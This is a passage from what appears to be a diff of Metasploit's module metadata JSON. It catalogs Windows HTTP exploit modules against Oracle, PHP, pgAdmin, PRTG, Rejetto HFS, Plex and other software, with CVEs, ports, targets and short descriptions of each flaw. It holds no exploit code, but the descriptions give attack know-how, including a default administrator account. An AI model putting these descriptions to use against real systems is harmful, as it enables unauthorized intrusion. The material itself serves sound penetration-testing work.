Authentication\n is required, however by default, Oracle ships with a \"oats\" account that you could\n log in with, which grants you administrator access.", - "references": [], - "platform": "Java", - "arch": "java", - "rport": 8088, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "WebLogic Server Administration Console 12 or prior" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/oats_weblogic_console.rb", - "is_install_path": true, - "ref_name": "windows/http/oats_weblogic_console", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/octopusdeploy_deploy": { - "name": "Octopus Deploy Authenticated Code Execution", - "fullname": "exploit/windows/http/octopusdeploy_deploy", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-05-15", - "type": "exploit", - "author": [ - "James Otten " - ], - "description": "This module can be used to execute a payload on an Octopus Deploy server given\n valid credentials or an API key. 
The payload is executed as a powershell script step\n on the Octopus Deploy server during a deployment.", - "references": [ - "URL-https://octopus.com" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Powershell" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/http/octopusdeploy_deploy.rb", - "is_install_path": true, - "ref_name": "windows/http/octopusdeploy_deploy", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/oracle9i_xdb_pass": { - "name": "Oracle 9i XDB HTTP PASS Overflow (win32)", - "fullname": "exploit/windows/http/oracle9i_xdb_pass", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-08-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the authorization\n code of the Oracle 9i HTTP XDB service. 
David Litchfield,\n has illustrated multiple vulnerabilities in the Oracle\n 9i XML Database (XDB), during a seminar on \"Variations\n in exploit methods between Linux and Windows\" presented\n at the Blackhat conference.", - "references": [ - "CVE-2003-0727", - "OSVDB-2449", - "BID-8375", - "URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Oracle 9.2.0.1 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/oracle9i_xdb_pass.rb", - "is_install_path": true, - "ref_name": "windows/http/oracle9i_xdb_pass", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/oracle_beehive_evaluation": { - "name": "Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability", - "fullname": "exploit/windows/http/oracle_beehive_evaluation", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-06-09", - "type": "exploit", - "author": [ - "1c239c43f521145fa8385d64a9c32243", - "mr_me ", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Oracle BeeHive. 
The processEvaluation method\n found in voice-servlet can be abused to write a malicious file onto the target machine, and\n gain remote arbitrary code execution under the context of SYSTEM.", - "references": [ - "CVE-2010-4417", - "ZDI-11-020", - "URL-http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html" - ], - "platform": "Windows", - "arch": "", - "rport": 7777, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Oracle Beehive 2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/oracle_beehive_evaluation.rb", - "is_install_path": true, - "ref_name": "windows/http/oracle_beehive_evaluation", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/oracle_beehive_prepareaudiotoplay": { - "name": "Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload", - "fullname": "exploit/windows/http/oracle_beehive_prepareaudiotoplay", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-11-10", - "type": "exploit", - "author": [ - "mr_me ", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Oracle BeeHive. The prepareAudioToPlay method\n found in voice-servlet can be abused to write a malicious file onto the target machine, and\n gain remote arbitrary code execution under the context of SYSTEM. 
Authentication is not\n required to exploit this vulnerability.", - "references": [ - "ZDI-15-550", - "URL-http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" - ], - "platform": "Windows", - "arch": "", - "rport": 7777, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Oracle Beehive 2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb", - "is_install_path": true, - "ref_name": "windows/http/oracle_beehive_prepareaudiotoplay", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/oracle_btm_writetofile": { - "name": "Oracle Business Transaction Management FlashTunnelService Remote Code Execution", - "fullname": "exploit/windows/http/oracle_btm_writetofile", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-08-07", - "type": "exploit", - "author": [ - "rgod ", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits abuses the FlashTunnelService SOAP web service on Oracle\n Business Transaction Management 12.1.0.7 to upload arbitrary files, without\n authentication, using the WriteToFile method. The same method contains a directory\n traversal vulnerability, which allows to upload the files to arbitrary locations.\n\n In order to execute remote code two techniques are provided. If the Oracle app has\n been deployed in the same WebLogic Samples Domain a JSP can be uploaded to the web\n root. If a new Domain has been used to deploy the Oracle application, the Windows\n Management Instrumentation service can be used to execute arbitrary code.\n\n Both techniques have been successfully tested on default installs of Oracle BTM\n 12.1.0.7, Weblogic 12.1.1 and Windows 2003 SP2. 
Default path traversal depths are\n provided, but the user can configure the traversal depth using the DEPTH option.", - "references": [ - "OSVDB-85087", - "BID-54839", - "EDB-20318" - ], - "platform": "Java,Windows", - "arch": "", - "rport": 7001, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Oracle BTM 12.1.0.7 / Weblogic 12.1.1 with Samples Domain / Java", - "Oracle BTM 12.1.0.7 / Windows 2003 SP2 through WMI" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/http/oracle_btm_writetofile.rb", - "is_install_path": true, - "ref_name": "windows/http/oracle_btm_writetofile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/oracle_endeca_exec": { - "name": "Oracle Endeca Server Remote Command Execution", - "fullname": "exploit/windows/http/oracle_endeca_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-07-16", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a command injection vulnerability on the Oracle Endeca\n Server 7.4.0. The vulnerability exists on the createDataStore method from the\n controlSoapBinding web service. The vulnerable method only exists on the 7.4.0\n branch and isn't available on the 7.5.5.1 branch. In addition, the injection\n has been found to be Windows specific. 
This module has been tested successfully\n on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).", - "references": [ - "CVE-2013-3763", - "BID-61217", - "OSVDB-95269", - "ZDI-13-190", - "URL-http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html" - ], - "platform": "Windows", - "arch": "x64, x86", - "rport": 7770, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/http/oracle_endeca_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/oracle_endeca_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/oracle_event_processing_upload": { - "name": "Oracle Event Processing FileUploadServlet Arbitrary File Upload", - "fullname": "exploit/windows/http/oracle_event_processing_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-04-21", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits an arbitrary file upload vulnerability in Oracle Event Processing\n 11.1.1.7.0. The FileUploadServlet component, which requires no authentication, can be\n abused to upload a malicious file onto an arbitrary location due to a directory traversal\n flaw, and compromise the server. By default Oracle Event Processing uses a Jetty\n Application Server without JSP support, which limits the attack to WbemExec. 
The current\n WbemExec technique only requires arbitrary write to the file system, but at the moment the\n module only supports Windows 2003 SP2 or older.", - "references": [ - "CVE-2014-2424", - "ZDI-14-106", - "BID-66871", - "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": 9002, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/oracle_event_processing_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/oracle_event_processing_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/osb_uname_jlist": { - "name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability", - "fullname": "exploit/windows/http/osb_uname_jlist", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-07-13", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits an authentication bypass vulnerability\n in login.php. 
In conjunction with the authentication bypass issue,\n the 'jlist' parameter in property_box.php can be used to execute\n arbitrary system commands.\n This module was tested against Oracle Secure Backup version 10.3.0.1.0", - "references": [ - "CVE-2010-0904", - "OSVDB-66338", - "ZDI-10-118" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Universal" - ], - "mod_time": "2022-06-29 19:10:52 +0000", - "path": "/modules/exploits/windows/http/osb_uname_jlist.rb", - "is_install_path": true, - "ref_name": "windows/http/osb_uname_jlist", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/peercast_url": { - "name": "PeerCast URL Handling Buffer Overflow", - "fullname": "exploit/windows/http/peercast_url", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-03-08", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.", - "references": [ - "CVE-2006-1148", - "OSVDB-23777", - "BID-17040" - ], - "platform": "Windows", - "arch": "", - "rport": 7144, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 English SP0-SP4", - "Windows 2003 English SP0-SP1", - "Windows XP English SP0/SP1", - "Windows XP English SP0/SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/peercast_url.rb", - "is_install_path": true, - "ref_name": "windows/http/peercast_url", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/http/pgadmin_binary_path_api": { - "name": "pgAdmin Binary Path API RCE", - "fullname": "exploit/windows/http/pgadmin_binary_path_api", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-03-28", - "type": "exploit", - "author": [ - "M.Selim Karahan", - "Mustafa Mutlu", - "Ayoub Mokhtar" - ], - "description": "pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE)\n vulnerability through the validate binary path API. This vulnerability\n allows attackers to execute arbitrary code on the server hosting PGAdmin,\n posing a severe risk to the database management system's integrity and the security of the underlying data.\n\n Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated.", - "references": [ - "CVE-2024-3116", - "URL-https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/", - "URL-https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-pgadmin-cve-2024-3116" - ], - "platform": "Windows", - "arch": "x64", - "rport": 8000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Target" - ], - "mod_time": "2025-04-11 15:55:46 +0000", - "path": "/modules/exploits/windows/http/pgadmin_binary_path_api.rb", - "is_install_path": true, - "ref_name": "windows/http/pgadmin_binary_path_api", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "config-changes", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/php_apache_request_headers_bof": { - "name": "PHP apache_request_headers Function Buffer Overflow", - "fullname": "exploit/windows/http/php_apache_request_headers_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-05-08", - "type": 
"exploit", - "author": [ - "Vincent Danen", - "juan vazquez " - ], - "description": "This module exploits a stack based buffer overflow in the CGI version of PHP\n 5.4.x before 5.4.3. The vulnerability is due to the insecure handling of the\n HTTP headers.\n\n This module has been tested against the thread safe version of PHP 5.4.2,\n from \"windows.php.net\", running with Apache 2.2.22 from \"apachelounge.com\".", - "references": [ - "CVE-2012-2329", - "OSVDB-82215", - "BID-53455", - "URL-http://www.php.net/archive/2012.php#id2012-05-08-1", - "URL-http://www.php.net/ChangeLog-5.php#5.4.3", - "URL-https://bugzilla.redhat.com/show_bug.cgi?id=820000" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/php_apache_request_headers_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/php_apache_request_headers_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/php_cgi_arg_injection_rce_cve_2024_4577": { - "name": "PHP CGI Argument Injection Remote Code Execution", - "fullname": "exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-06-06", - "type": "exploit", - "author": [ - "Orange Tsai", - "watchTowr", - "sfewer-r7" - ], - "description": "This module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations\n on a Windows target. 
A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that\n the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)\n character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose\n the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),\n and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches.\n\n XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target\n an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.", - "references": [ - "CVE-2024-4577", - "URL-https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/", - "URL-https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/" - ], - "platform": "PHP,Windows", - "arch": "php, cmd", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows PHP", - "Windows Command" - ], - "mod_time": "2024-06-13 15:10:14 +0000", - "path": "/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb", - "is_install_path": true, - "ref_name": "windows/http/php_cgi_arg_injection_rce_cve_2024_4577", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/plesk_mylittleadmin_viewstate": { - "name": "Plesk/myLittleAdmin ViewState .NET Deserialization", - "fullname": "exploit/windows/http/plesk_mylittleadmin_viewstate", - "aliases": [], - "rank": 600, - "disclosure_date": 
"2020-05-15", - "type": "exploit", - "author": [ - "Spencer McIntyre", - "wvu " - ], - "description": "This module exploits a ViewState .NET deserialization vulnerability in\n web-based MS SQL Server management tool myLittleAdmin, for version 3.8\n and likely older versions, due to hardcoded parameters in\n the web.config file for ASP.NET.\n\n Popular web hosting control panel Plesk offers myLittleAdmin as an\n optional component that is selected automatically during \"full\"\n installation. This exploit caters to the Plesk target, though it\n should work fine against a standalone myLittleAdmin setup.\n\n Successful exploitation results in code execution as the user running\n myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as\n the \"SQL Admin MSSQL anonymous account.\"\n\n Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.", - "references": [ - "CVE-2020-13166", - "URL-https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/", - "URL-https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 8401, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2021-03-31 12:07:57 +0000", - "path": "/modules/exploits/windows/http/plesk_mylittleadmin_viewstate.rb", - "is_install_path": true, - "ref_name": "windows/http/plesk_mylittleadmin_viewstate", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/plex_unpickle_dict_rce": { - "name": "Plex Unpickle Dict Windows RCE", - "fullname": 
"exploit/windows/http/plex_unpickle_dict_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-05-07", - "type": "exploit", - "author": [ - "h00die", - "Chris Lyne" - ], - "description": "This module exploits an authenticated Python unsafe pickle.load of a Dict file. An authenticated attacker\n can create a photo library and add arbitrary files to it. After setting the Windows only Plex variable\n LocalAppDataPath to the newly created photo library, a file named Dict will be unpickled, which causes\n an RCE as the user who started Plex.\n Plex_Token is required, to get it you need to log-in through a web browser, then check the requests to grab\n the X-Plex-Token header. See info -d for additional details.\n If an exploit fails, or is cancelled, Dict is left on disk, a new ALBUM_NAME will be required\n as subsuquent writes will make Dict-1, and not execute.", - "references": [ - "URL-https://github.com/tenable/poc/blob/master/plex/plex_media_server/auth_dict_unpickle_rce_exploit_tra_2020_32.py", - "URL-https://www.tenable.com/security/research/tra-2020-32", - "URL-http://support.plex.tv/articles/201105343-advanced-hidden-server-settings/", - "URL-https://forums.plex.tv/t/security-regarding-cve-2020-5741/586819", - "CVE-2020-5741" - ], - "platform": "Python", - "arch": "python", - "rport": 32400, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Target" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/http/plex_unpickle_dict_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/plex_unpickle_dict_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-restarts" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk", - "config-changes" - ] - }, - "session_types": 
false, - "needs_cleanup": true - }, - "exploit_windows/http/privatewire_gateway": { - "name": "Private Wire Gateway Buffer Overflow", - "fullname": "exploit/windows/http/privatewire_gateway", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-06-26", - "type": "exploit", - "author": [ - "Michael Thumann " - ], - "description": "This exploits a buffer overflow in the ADMCREG.EXE used\n in the PrivateWire Online Registration Facility.", - "references": [ - "CVE-2006-3252", - "OSVDB-26861", - "BID-18647" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 English SP0", - "Windows 2000 English SP1", - "Windows 2000 English SP2", - "Windows 2000 English SP3", - "Windows 2000 English SP4", - "Windows 2003 English SP0/SP1", - "Debugging" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/privatewire_gateway.rb", - "is_install_path": true, - "ref_name": "windows/http/privatewire_gateway", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/prtg_authenticated_rce": { - "name": "PRTG Network Monitor Authenticated RCE", - "fullname": "exploit/windows/http/prtg_authenticated_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-06-25", - "type": "exploit", - "author": [ - "Josh Berry ", - "Julien Bedel " - ], - "description": "Notifications can be created by an authenticated user and can execute scripts when triggered.\n Due to a poorly validated input on the script name, it is possible to chain it with a user-supplied command allowing command execution under the context of privileged user.\n The module uses provided credentials to log in to the web interface, then creates and triggers a malicious notification to perform RCE 
using a Powershell payload.\n It may require a few tries to get a shell because notifications are queued up on the server.\n This vulnerability affects versions prior to 18.2.39. See references for more details about the vulnerability allowing RCE.", - "references": [ - "CVE-2018-9276", - "URL-https://www.codewatch.org/blog/?p=453" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/http/prtg_authenticated_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/prtg_authenticated_rce", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects", - "config-changes", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/prtg_authenticated_rce_cve_2023_32781": { - "name": "PRTG CVE-2023-32781 Authenticated RCE", - "fullname": "exploit/windows/http/prtg_authenticated_rce_cve_2023_32781", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-08-09", - "type": "exploit", - "author": [ - "Kevin Joensen " - ], - "description": "Authenticated RCE in Paessler PRTG", - "references": [ - "URL-https://baldur.dk/blog/prtg-rce.html", - "CVE-2023-32781" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows_Fetch", - "Windows_CMDStager" - ], - "mod_time": "2024-01-22 10:10:14 +0000", - "path": "/modules/exploits/windows/http/prtg_authenticated_rce_cve_2023_32781.rb", - "is_install_path": true, - "ref_name": 
"windows/http/prtg_authenticated_rce_cve_2023_32781", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/psoproxy91_overflow": { - "name": "PSO Proxy v0.91 Stack Buffer Overflow", - "fullname": "exploit/windows/http/psoproxy91_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-02-20", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a buffer overflow in the PSO Proxy v0.91 web server.\n If a client sends an excessively long string the stack is overwritten.", - "references": [ - "CVE-2004-0313", - "OSVDB-4028", - "EDB-156", - "BID-9706" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 Pro SP0-4 English", - "Windows 2000 Pro SP0-4 French", - "Windows 2000 Pro SP0-4 Italian", - "Windows XP Pro SP0/1 English", - "Windows XP Pro SP2 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/psoproxy91_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/psoproxy91_overflow", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/rabidhamster_r4_log": { - "name": "RabidHamster R4 Log Entry sprintf() Buffer Overflow", - "fullname": "exploit/windows/http/rabidhamster_r4_log", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-02-09", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in RabidHamster R4's web server.\n By supplying a malformed HTTP request, it is possible to trigger a 
stack-based\n buffer overflow when generating a log, which may result in arbitrary code\n execution under the context of the user.", - "references": [ - "OSVDB-79007", - "URL-http://aluigi.altervista.org/adv/r4_1-adv.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 8888, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "R4 v1.25" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/http/rabidhamster_r4_log.rb", - "is_install_path": true, - "ref_name": "windows/http/rabidhamster_r4_log", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/rejetto_hfs_exec": { - "name": "Rejetto HttpFileServer Remote Command Execution", - "fullname": "exploit/windows/http/rejetto_hfs_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-09-11", - "type": "exploit", - "author": [ - "Daniele Linguaglossa ", - "Muhamad Fadzil Ramli " - ], - "description": "Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a\n poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by\n using '%00' to bypass the filtering. 
This module has been tested successfully on HFS 2.3b\n over Windows XP SP3, Windows 7 SP1 and Windows 8.", - "references": [ - "CVE-2014-6287", - "OSVDB-111386", - "URL-https://seclists.org/bugtraq/2014/Sep/85", - "URL-http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2021-05-09 12:40:48 +0000", - "path": "/modules/exploits/windows/http/rejetto_hfs_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/rejetto_hfs_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/rejetto_hfs_rce_cve_2024_23692": { - "name": "Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution", - "fullname": "exploit/windows/http/rejetto_hfs_rce_cve_2024_23692", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-05-25", - "type": "exploit", - "author": [ - "sfewer-r7", - "Arseniy Sharoglazov" - ], - "description": "The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to an unauthenticated server side template\n injection (SSTI) vulnerability. A remote unauthenticated attacker can execute code with the privileges\n of the user account running the HFS.exe server process. This exploit has been tested to work against version\n 2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers\n and no patch is available. 
